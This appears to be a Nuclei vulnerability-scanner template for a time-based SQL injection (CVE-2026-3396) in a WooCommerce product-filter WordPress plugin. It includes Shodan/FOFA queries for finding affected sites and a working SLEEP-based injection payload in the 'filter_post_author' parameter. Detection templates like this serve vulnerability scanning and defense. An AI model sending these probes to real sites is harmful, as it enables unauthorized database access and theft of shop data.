id: CVE-2026-3396 info: name: WCAPF WooCommerce Ajax Product Filter - SQL Injection author: theamanrawat severity: high description: | WCAPF WooCommerce Ajax Product Filter <= 4.2.3 contains a time-based SQL injection caused by insufficient escaping of the 'post-author' parameter, letting unauthenticated attackers extract sensitive database information remotely. impact: | Unauthenticated attackers can extract sensitive database information, potentially compromising data confidentiality. remediation: | Update to a version later than 4.2.3 or the latest available version. reference: - https://patchstack.com/database/vulnerability/wordpress-wcapf-woocommerce-ajax-product-filter-plugin-4-2-3-unauthenticated-time-based-sql-injection-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2026-3396 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2026-3396 epss-score: 0.22856 epss-percentile: 0.9603 cwe-id: CWE-89 metadata: verified: true max-request: 2 shodan-query: 'http.html:"/wp-content/plugins/wc-ajax-product-filter/"' fofa-query: 'body="/wp-content/plugins/wc-ajax-product-filter/"' tags: sqli,wp-plugin,wc-ajax-product-filter,woocommerce,wordpress flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wc-ajax-product-filter/readme.txt" matchers-condition: and matchers: - type: status status: - 200 internal: true - type: word words: - "WCAPF" - "WooCommerce Ajax Product Filter" condition: and internal: true - method: GET path: - "{{BaseURL}}/shop/?filter_post_author=1%27%20AND%20SLEEP(6)%20AND%20%271%27%3D%271" matchers: - type: dsl dsl: - 'duration>=6' - 'contains(body, "No results found")' - 'status_code == 200' condition: and # digest: 4a0a00473045022100f0928d96879bda7549ed0b3315322f01684cb8b19bf84bf0bb6863cd5698c51d0220199964c9f06499c4ead8688b0fb36688446014b596dcdcdf0be9057bed0a89f6:922c64590222798bb761d5b6d8e72950